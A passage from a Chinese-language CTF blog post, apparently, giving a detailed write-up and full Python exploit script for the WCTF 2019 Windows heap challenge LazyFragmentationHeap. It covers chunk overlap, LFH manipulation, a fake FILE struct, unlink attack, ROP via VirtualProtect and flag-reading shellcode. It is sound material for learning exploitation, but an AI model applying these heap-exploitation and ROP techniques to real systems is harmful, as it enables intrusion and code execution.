edit_engineer("23", p64(system))

# trigger
quit()

p.interactive()

[Windows][WCTF 2019]LazyFragmentationHeap

这题靶机上没有”magic.txt”,所以没法打通,因此只在本地复现了一下,学到不少东西。

题目分析

首先题目提供了一个菜单,常规的createeditshowdelete一个chunk的功能,以及一个额外的openread一个”magic.txt`文件的内容:

1
2
3
4
5
6
1. Allocate buffer for File
2. Edit File content
3. Show content
4. Clean content
5. LazyFileHandler
6. Exit

需要注意的是:

  • 这里我把相关的结构体定义一下:

    1
    2
    3
    4
    5
    6
    7
    00000000 file_buf        struc ; (sizeof=0x28, mappedto_36)
    00000000 exist_status dq ?
    00000008 size dq ?
    00000010 id dq ?
    00000018 edit_status dq ?
    00000020 buffer dq ?
    00000028 file_buf ends
  • create限制大小在0x80 ~ 0x2000之间;

  • edit限制同一个chunk只能进行两次,因为每次edit之前:

    1
    2
    3
    4
    5
    6
    7
    if ( !array[v16].buffer
    || array[v18].edit_status != 0xDDAABEEF1ACDi64
    || array[v18].exist_status != 0xDDAABEEF1ACDi64 )
    {
    puts("Error !");
    exit(-3);
    }

    都会检查edit_status,并且edit之后:

    1
    array[v18].edit_status ^= 0xFACEB00CA4DADDAAui64;

    都会更改这个edit_status,因此下次就不能再写了。

    但是edit里面存在一个典型的通过strlen获取写入长度的漏洞,因此可以覆盖到下一个chunk的头(6 bytes),构造chunk overlap。

  • delete限制只能使用两次。

  • LazyFileHandler里面open次数不受限制,但是read只能两次,但是可以任意size读(只要不超过文件大小)。

利用思路

  1. 首先create几个比较大的chunk,因为是在default heap上分配的,所以碎片比较多,但是size大的chunk不受影响,并且相邻:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
                            +-----------+  
    create(0x3F8, 1) ---> | 0x400 |
    +-----------+ -----
    create(0x408, 2) ---> | 0x410 | |
    +-----------+ |
    create(0x4E8, 3) ---> | 0x4F0 | |
    +-----------+ 0x1000
    create(0x378, 4) ---> | 0x380 | | ---> to be freed
    +-----------+ |
    create(0x378, 5) ---> | 0x380 | | ---> victim chunk
    +-----------+ -----
    create(0x3F8, 6) ---> | 0x400 | ---> gap
    +-----------+
    create(0x378, 7) ---> | 0x380 |
    +-----------+
    create(0x378, 8) ---> | 0x380 |
    +-----------+
  2. 然后通过LazyFileHandler提供的openread读取0x3F8 bytes的内容到chunk 1中,这样在show chunk 1的时候,可以leak出chunk 2的header,但是被encode过了;不过只要手动还原出原始头然后decode,就能得到_HEAP->Encoding了。
  3. 由于edit的逻辑是如果strlen更长的话,读入的size就变长:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    v19 = -1i64;
    v20 = (_BYTE *)array[v18].buffer;
    v21 = array[v18].size;
    do
    ++v19;
    while ( v20[v19] );
    if ( v19 > v21 && array[v18].edit_status == 0xDDAABEEF1ACDi64 )
    {
    v21 = -1i64;
    do
    ++v21;
    while ( v20[v21] );
    }
    if ( read(0, v20, v21) <= 0 )
    {
    puts("read error");
    _exit(1);
    }
    因此对chunk 1进行edit,就可以覆盖到chunk 2的header,将其size修改为0x1000即可覆盖chunk 2、3、4、5。
  4. 由于LazyFileHandler提供的open可以无限调用,并且每次都会申请一个0x60大小的chunk存放FILE结构体;再加上LFH(LowFragmentationHeap)的机制,到一定程度的时候,会开启LFH,即
    分配一个大的chunk用作userblock(这里Slides里面提到的大小是0x1000,可能我本机环境不同,实际上只有0x810)。
    然而实际调试中,先于0x60的chunk,0x20的chunk会先开启LFH,所以同样会从上面构造的0x1000的overlapped chunk中割出0x410作为userblock,这样FILE结构体就落在overlapped chunk + 0x410的位置了。
  5. 此时chunk 3的位置正好存放了一个堆地址,这是原来chunk的Flink,通过show chunk 3,我们可以得到堆地址。(这里地址会有微小的变化,从而影响了后面需要用到堆地址的部分,也造成了最后的exp概率性失败,不过成功率依然很高)。
  6. 既然FILE结构体落在chunk 3、4的空间内,由于LFH位置的不确定性,具体FILE落在userblock的哪个chunk里未知,但是我们可以全部填满伪造的FILE结构体。
    这里主要是要伪造FILEfd = 0,以及buffer = 0xBEEFDAD0000 + 0x28 * 5 + 0x20,即第六个file_buf结构体的buffer处,从而类似于Linux下_IO_FILE的利用,后面调用LazyFileHandler提供的fread_s((void *)array[v9].buffer, v10, 1ui64, v10, Stream);,实际上是从标准输入中读到0xBEEFDAD0000 + 0x28 * 5 + 0x20这个位置,从而可以覆盖掉file_buf->buffer指针,达到任意地址读的功能。
    由于windows的特性,无论是程序本身,还是加载的dll,在一定时间内其基址都是不变的,因此虽然程序运行一次只能调用read file两次,即只能完成一次任意地址读(或写),但是可以多次运行程序读不同的地址即可。
    所以这里先把程序基址和ucrtbase的地址给leak出来了。
  7. 当然仅仅是任意地址读显然是不够得,我们得劫持程序控制流读出flag来。
    注意到在FILE所用的userblock被分配出来之后,我们之前构造的overlapped chunk仍然有0x3E0的空间留下来,而这个0x3E0的空间把chunk 5的header和Flink、Blink给overlap了。
    所以可以分配出这个0x3E0的chunk,修改chunk 5的header为freed状态,以及修改Flink和Blink满足unlink check,再free chunk 4完成unlink attack,在0xBEEFDAD0000 + 0x28 * 4 + 0x20写入了一个指向本身的指针。
    另外,由于chunk 5本身是没有在Freelist或者ListHints中的,所以这些链表都没有corruption,只是可能存在被overlapped的LFH userblock被破坏了的问题,不过不影响后续的利用。
  8. 完成上述利用之后,我们可以构造出这样的primitive:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    file_buf[6]->buffer = &file_buf[6]->edit_status; 
    // then use chunk 6 to edit
    file_buf[7]->edit_status = 0xDDAABEEF1ACD;
    file_buf[7]->buffer = arbitrary_addr;
    file_buf[8]->edit_status = 00xDDAABEEF1ACD;
    file_buf[8]->buffer = &file_buf[6]->edit_status;
    // then use chunk 7 to arbitrary read or write
    ....
    // then use chunk 8 to edit, make chunk 6 can edit again
    file_buf[6]->buffer = &file_buf[6]->edit_status;
    file_buf[6]->edit_status = 00xDDAABEEF1ACD;
    因此只要不断调用以上的primitive,就可以实现任意次数的任意地址读和写。
  9. 但是存在的问题是,p64(0xDDAABEEF1ACD)中存在”\x1A”字符,在windows中,这个字符备用表示字符串流的结尾,因此如果输入中存在这个字符,那么它后面的字符都不会被接受,那我们上面构造的primitive就用不了了。
    然而注意到,我们做leak和做最后利用的时候是分开的,也就是说read file的功能还只用了一次,于是我们可以同上面提到的任意地址读(或写)一次,将ucrtbase!_pioinfo[0] + 0x38上1 byte的flag标志置为0x09,这样可以把输入流模式从字符流改为二进制流,这样任意字符都可以读入了。
    需要注意的是ucrtbase!_pioinfo[0] + 0x38是个堆地址,所以其偏移是相对稳定的(有时会稍微变化),再加上堆地址我们早就得到了,所以完全可以预测到它的位置。
  10. 那么承接使用上面的primitive,我们可以:
    1
    kernel32.ll -> ntdll.dll -> ntdll!PebLdr - 0x78 --> PEB --> TEB --> stack_end
    完成一条leak链,然后从stack搜索返回地址。
  11. 注意到main函数是不会返回的,只会直接exit,所以这里采用劫持_read函数的返回地址的方法。
    这是因为我们最后写ROP的时候,一定是通过edit功能写的,而归根到底是通过_read写的,那么覆盖_read的返回地址就可以在返回的时候劫持到程序控制流了。
    至于怎么定位_read返回地址的位置,由于我们是通过show功能进行leak的,最终也是通过调用printf打印的,而printf_read使用的栈帧是同样的,即返回地址存放在栈上的地址是一致的。
    故我们只要以printf的返回地址作为标志,搜索栈内存空间,即可同样定位到_read的返回地址所在的位置。
  12. 此外有一个需要注意的点是,虽然AngelBoy的Slides中提到了Child Process Policy,在Ex师傅的博客地下的评论中也有”新版的Windows API新增 PROCESS_MITIGATION_CHILD_PROCESS_POLICY 的功能”这样一句话,但是实际在本地调试中并没有感受到它的存在,虽然最后写system的ROP时候并没有getshell,但其原因貌似在于LFH userblock corruption了,至于实际情况还有待考证。
  13. 因此这里采用Slides中的做法,也是最稳健的做法,即通过任意地址写在.data段上写入一段orw的shellcode,然后ROP调用VirtualProtect修改.data段的权限为RWX,最后跳转到shellcode执行即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'amd64'

# p = remote("node3.buuoj.cn", 26659)

class Attack():
def __init__(self):
self.menu = {
"create": 1,
"edit": 2,
"show": 3,
"delete": 4,
"file": 5,
"exit": 6,
"open": 1,
"read": 2,
"back": 3
}
self.array_addr = 0xBEEFDAD0000

self.p = None
self.encoding = None
self.heap_addr = None
self.text_base = None
self.ucrtbase = None
self.pioinfo_offset = None
self.kernel32 = None
self.ntdll = None
self.PEB = None
self.TEB = None
self.stack_end = None
self.ret_address_in_stack = None

def run(self):
while True:
try:
self.do_simple_leak()
self.do_attack()
# self.debug()
self.show_info()
self.p.interactive()
break
except AssertionError as e:
self.p.close()
continue
except EOFError as e:
self.p.close()
continue
except:
self.p.close()
break

def debug(self):
if len(sys.argv) == 2 and sys.argv[1] == '1':
windbgx.attach(self.p)

def choose_func(self, choice):
self.p.sendlineafter("Your choice: ", str(self.menu[choice]), timeout=1)

def create(self, size, idx):
self.choose_func("create")
self.p.sendlineafter("Size:", str(size))
self.p.sendlineafter("ID", str(idx))

def edit(self, idx, content):
self.choose_func("edit")
self.p.sendlineafter("ID", str(idx), timeout=1)
self.p.sendafter("Content:", content)

def show(self, idx):
self.choose_func("show")
self.p.sendlineafter("ID", str(idx))
self.p.recvuntil("Content: ")

def delete(self, idx):
self.choose_func("delete")
self.p.sendlineafter("ID", str(idx), timeout=1)

def open_file(self):
self.choose_func("file")
self.choose_func("open")
self.choose_func("back")

def read_file(self, idx, size, content=None):
self.choose_func("file")
self.choose_func("read")
self.p.sendlineafter("ID", str(idx))
self.p.sendlineafter("Size:", str(size))
if content:
self.p.send(content)
self.choose_func("back")

def quit(self):
self.choose_func("exit")

def ctor_heap_head(self, size, flags, prev_size, remain_size):
chksum = ((size >> 4) & 0xff) ^ ((size >> 4) >> 8) ^ flags
val = (size >> 4) | (flags << 16) | (chksum << 24) | (prev_size >> 4 << 32) | (remain_size << 56)
return val

def ctor_fake_file(self, buf, fileno):
fake_file = ""
fake_file += p64(0) + p64(buf) # buffer
fake_file += p32(0) + p32(0x2080)
fake_file += p64(fileno) # fileno = 0
fake_file += p64(0x100) + p64(0)
fake_file += p64(0xFFFFFFFFFFFFFFFF)
fake_file += p64(0xFFFFFFFF)
fake_file += p64(0x0) * 2
fake_file += p64(0x0)
fake_file += p64(0)
return fake_file

def prepare(self):
self.create(0x3F8, 1)
self.create(0x408, 2)
self.create(0x4E8, 3)
self.create(0x378, 4)
self.create(0x378, 5) # --> victim
self.create(0x3F8, 6) # gap
self.create(0x378, 7) # --> to be freed
self.create(0x378, 8)

# leak encoding
self.open_file()
self.read_file(1, 0x3F8)
self.show(1)
self.p.recvuntil(", use th")
encode_head = u64(self.p.recv(6) + "\x00\x08")
self.encoding = self.ctor_heap_head(0x410, 0x1, 0x400, 0x8) ^ encode_head

# overwrite chunk 2's head
fake_head = self.ctor_heap_head(0x1000, 0x1, 0x400, 0x8) ^ self.encoding
self.edit(1, "A" * 0x3F8 + p64(fake_head)[:6])

# chunk overlap
self.delete(2)

# use LFH, which is just at chunk 3's space
for i in range(7):
self.open_file()

# leak heap address
self.show(3)
self.heap_addr = u64(self.p.recvline()[:-2].ljust(8, "\x00"))
assert(self.heap_addr != 0)

# hijack FILE struct
payload = "\x00" * 0x50 # padding
payload += self.ctor_fake_file(self.array_addr + 0x28 * 5 + 0x20, 0) * 12
self.edit(3, payload)
payload = "\x00" * 0x40 # padding
payload += self.ctor_fake_file(self.array_addr + 0x28 * 5 + 0x20, 0) * 7
self.edit(4, payload)

def leak_text_base(self):
# use fread to arbitrary write and read
target_addr = self.heap_addr + 0xCFB2 - 0xCB50 # skip \x00\x00
self.read_file(8, 0x8, p64(target_addr))
self.show(6)
self.text_base = u64(self.p.recvline()[:-2].ljust(8, "\x00")) << 16
assert(self.text_base >> 24 != 0)

def leak_ucrtbase(self):
target_addr = self.text_base + 0x30A0 # atoll_iat
self.read_file(8, 0x8, p64(target_addr))
self.show(6)
self.ucrtbase = u64(self.p.recvline()[:-2].ljust(8, "\x00")) - 0x67A30

def leak_pioinfo(self):
target_addr = self.ucrtbase + 0xF0980 # ucrtbase!_pioinfo[0]
self.read_file(8, 0x8, p64(target_addr))
self.show(6)
self.pioinfo_offset = u64(self.p.recvline()[:-2].ljust(8, "\x00")) & 0xFFFF
assert(self.pioinfo_offset != 0)

def do_simple_leak(self):
self.p = process("./LazyFragmentationHeap.exe")
self.prepare()
self.leak_text_base()
self.p.close()

self.p = process("./LazyFragmentationHeap.exe")
self.prepare()
self.leak_ucrtbase()
self.p.close()

self.p = process("./LazyFragmentationHeap.exe")
self.prepare()
self.leak_pioinfo()
self.p.close()

def write_pioinfo(self):
self.prepare()
pioinfo = (self.heap_addr >> 16 << 16) | self.pioinfo_offset
self.read_file(6, 8, p64(pioinfo + 0x38))
self.edit(6, "\x09") # change to binary mode

def unlink_attack(self):
self.create(0x3C8, 2)
payload = "\x00" * 0x58 # padding
payload += p64(self.ctor_heap_head(0x380, 0x0, 0x380, 0x0) ^ self.encoding) # fake victim chunk head (freed status)
payload += p64(self.array_addr + 0x28 * 4 + 0x20 - 0x8) + p64(self.array_addr + 0x28 * 4 + 0x20)
self.edit(2, payload)
self.delete(4)

def arbitrary_write(self, addr, content, final_write=False):
# | edit_status | buffer |
payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
# | exist_status | size | id | edit_status | buffer |
payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(7) + p64(0xDDAABEEF1ACD) + p64(addr)
# | exist_status | size | id | edit_status | buffer |
payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(8) + p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)

self.edit(6, payload)
self.edit(7, content)

if final_write == False:
# | edit_status | buffer |
payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
self.edit(8, payload)

def arbitrary_read(self, addr):
# | edit_status | buffer |
payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
# | exist_status | size | id | edit_status | buffer |
payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(7) + p64(0xDDAABEEF1ACD) + p64(addr)
# | exist_status | size | id | edit_status | buffer |
payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(8) + p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)

self.edit(6, payload)
self.show(7)
value = u64(self.p.recvline()[:-2].ljust(8, "\x00"))

# | edit_status | buffer |
payload = p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
self.edit(8, payload)

return value

def search_ret_addr(self):
address = self.stack_end - 0x8
for offset in range(0, 0x1000, 8):
val = self.arbitrary_read(address)
if val == self.text_base + 0x17C4: # return address of printf
break
else:
address -= 8
assert(address !=self.stack_end - 0x1000)
return address

def write_shellcode(self):
_open = self.ucrtbase + 0xA5550
_read = self.ucrtbase + 0x182A0
_write = self.ucrtbase + 0x17BA0
_exit = self.ucrtbase + 0x74630
filename = self.text_base + 0x5400 # .data segment
buffer = self.text_base + 0x5450 # .data segment
shellcode_addr = self.text_base + 0x5500 # .data segment

# args: rcx, rdx, r8, r9, (stack)
shellcode = r'''
open_file:
mov rdi, 0x%x
mov rcx, 0x%x
mov rdx, 0
call rdi

read_file:
mov rdi, 0x%x
mov rcx, rax
mov rdx, 0x%x
mov r8, 0x30
call rdi

write_file:
mov rdi, 0x%x
mov rcx, 1
mov rdx, 0x%x
mov r8, 0x30
call rdi

exit:
mov rdi, 0x%x
mov rdx, 1
call rdi
''' % (_open, filename, _read, buffer, _write, buffer, _exit)\

self.arbitrary_write(shellcode_addr, asm(shellcode))
self.arbitrary_write(filename, "./flag.txt")

def write_rop(self):
data_segment = self.text_base + 0x5000
shellcode_addr = data_segment + 0x500
VirtualProtect = self.kernel32 + 0x1BC70
pop_rcx_r8_r9_r10_r11 = self.ntdll + 0x8c551 # pop rcx ; pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret
pop_rdx_r11 = self.ntdll + 0x8C557 # pop rdx ; pop r11 ; ret

# jmp shellcode
payload = p64(pop_rcx_r8_r9_r10_r11)
payload += p64(data_segment) + p64(0x40) + p64(data_segment + 0xA00) + p64(0) + p64(0) # 0x40 is PAGE_EXECUTE_READWRITE
payload += p64(pop_rdx_r11)
payload += p64(0x1000) + p64(0)
payload += p64(VirtualProtect)
payload += p64(shellcode_addr)

# # system("cmd.exe") doesn't work, since LFH has broken
# system = self.ucrtbase + 0xAE5C0
# payload = p64(pop_rcx_r8_r9_r10_r11)
# payload += p64(self.ret_address_in_stack + 0x40) + p64(0) + p64(0) + p64(0) + p64(0)
# payload += p64(pop_rdx_r11 + 3)
# payload += p64(system)
# payload += "cmd.exe\x00"

self.arbitrary_write(self.ret_address_in_stack, payload, final_write=True)

def do_attack(self):
self.p = process("./LazyFragmentationHeap.exe")
self.write_pioinfo()

# let chunk 5 points to itself
self.unlink_attack()

payload = "A" * 0x8
# | exist_status | size | id | edit_status | buffer |
payload += p64(0xDDAABEEF1ACD) + p64(0x378) + p64(6) + p64(0xDDAABEEF1ACD) + p64(self.array_addr + 0x28 * 5 + 0x18)
self.edit(5, payload)

# do arbitrary read and write
self.kernel32 = self.arbitrary_read(self.text_base + 0x3028) - 0x24890 # GetCurrentProcessId_iat in binary
self.ntdll = self.arbitrary_read(self.kernel32 + 0x82888) - 0x8CBC0 # atol_iat in kernel32
self.PEB = self.arbitrary_read(self.ntdll + 0x16A448) - 0x80 # ntdll!PebLdr - 0x78
self.TEB = self.PEB + 0x1000
self.stack_end = (self.arbitrary_read(self.TEB + 0x11) << 8) + 0x3000

# find where return address lies
self.ret_address_in_stack = self.search_ret_addr()

# write shellcode
self.write_shellcode()

# write ROP
self.debug()
self.write_rop()

def show_info(self):
print("[+] encoding is: %s " % hex(self.encoding))
print("[+] heap_base is: %s " % hex(self.heap_addr))
print("[+] text_base is: %s " % hex(self.text_base))
print("[+] ucrtbase is: %s " % hex(self.ucrtbase))
print("[+] pioinfo[0] offset is: %s " % hex(self.pioinfo_offset))
print("[+] kernel32 is: %s " % hex(self.kernel32))
print("[+] ntdll is: %s " % hex(self.ntdll))
print("[+] PEB is: %s " % hex(self.PEB))
print("[+] TEB is: %s " % hex(self.TEB))
print("[+] stack_end is: %s " % hex(self.stack_end))
print("[+] ret_address_in_stack is: %s " % hex(self.ret_address_in_stack))

if __name__ == "__main__":
attack = Attack()
attack.run()

参考链接

  1. https://whereisk0shl.top/hitb_gsec_ctf_babyshellcode_writeup.html
  2. https://bbs.pediy.com/thread-221016.htm
  3. http://www.jbox.dk/sanos/source/win32/msvcrt/except.c.html
  4. https://whereisk0shl.top/post/hitb_gsec_ctf_babystack_writeup
  5. https://www.anquanke.com/post/id/188170
  6. https://www.anquanke.com/post/id/188170#h3-4
  7. https://www.cnblogs.com/lanrenxinxin/p/4631836.html
  8. https://b0ldfrev.gitbook.io/note/windows_operating_system/windowsseh-li-yong
  9. http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring-control-flow-guard-in-windows10.pdf
  10. https://xz.aliyun.com/t/2587
  11. https://github.com/scwuaptx/LazyFragmentationHeap
  12. http://blog.eonew.cn/archives/1253#more-1253
Author: Nop
Link: https://n0nop.com/2021/04/20/BUUOJ-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-Windows-Pwn/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.